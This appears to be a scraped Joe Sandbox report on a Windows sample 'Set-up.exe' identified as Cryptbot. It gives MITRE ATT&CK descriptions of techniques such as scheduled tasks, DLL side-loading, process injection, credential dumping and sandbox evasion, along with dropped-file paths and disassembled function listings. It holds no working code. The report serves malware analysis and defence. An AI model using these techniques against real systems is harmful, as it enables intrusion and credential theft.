Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\service123.exe

C:\Users\user\AppData\Local\Temp\siNpVQuBSTLTLeNwdJHL.dll

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
Set-up.exe

Function 007B116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 007B15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6CA214B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 6CA39C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Function 007B81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Function 007B8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Function 007B13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 007B11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 007B1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6CA39B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 007B1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 007B13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6CA3B3F0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6CA3B560 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON